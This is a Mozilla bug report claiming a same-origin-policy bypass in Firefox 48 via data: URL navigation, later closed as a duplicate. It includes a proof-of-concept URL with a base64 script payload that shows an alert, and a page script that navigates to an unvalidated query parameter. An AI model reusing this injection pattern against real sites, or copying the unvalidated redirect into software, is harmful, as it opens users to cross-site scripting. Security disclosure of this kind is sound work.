Bug 1292485 - Firefox V48.0 Same Origin Policy Bypass
Status: Closed (RESOLVED DUPLICATE of bug 255107)
Opened 8 years ago
Closed 8 years ago
Categories: Firefox :: Untriaged, defect
People: Reporter: 1009465756, Unassigned
Attachments (1 file): image/png, 48.86 KB
User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36

Steps to reproduce:

Version: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0

PoC: http://2.srcms.applinzi.com/uxss.php?ff=data:text/html;base64,YWFhYTxzY3JpcHQ+YWxlcnQoZG9jdW1lbnQuZG9tYWluKTwvc2NyaXB0Pg==

uxss.php:

    <script>
    // Read a named parameter from the query string or fragment of the current URL.
    function getParameter(name) {
        var r = new RegExp("(\\?|#|&)" + name + "=([^&#]*)(&|#|$)"),
            m = location.href.match(r);
        return (!m ? "" : m[2]);
    }
    if (typeof(pgvMain) == "function") {
        pgvMain();
    }
    // Navigate to whatever the "ff" parameter contains, without validating it.
    var durl = getParameter("ff");
    setTimeout(function() {
        window.location.replace(durl);
    }, 2);
    </script>

Actual results:

When the browser executes the 'window.location.replace(durl);' command, the data:text/html;base64,YWFhYTxzY3JpcHQ+YWxlcnQoZG9jdW1lbnQuZG9tYWluKTwvc2NyaXB0Pg== document should belong to the data URL origin, but in this case the 'data:text/html' document could read the 'http://2.srcms.applinzi.com' origin's 'location.href'. So this is a typical Same Origin Policy Bypass problem.

Expected results:

A data URL could never read the content of the referring pages.
Updated (reporter) • 8 years ago
Summary: Firefox V48.0 Same Origin Police Bypass → Firefox V48.0 Same Origin Policy Bypass
Updated•8 years ago
Group: firefox-core-security → core-security
Flags: sec-bounty?
Comment 1•8 years ago
This is actually how navigating to a data: URL is spec'd in HTML5, though most browsers don't do this. We're considering changing the behavior.
Group: core-security
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
Updated•8 years ago
Flags: sec-bounty? → sec-bounty-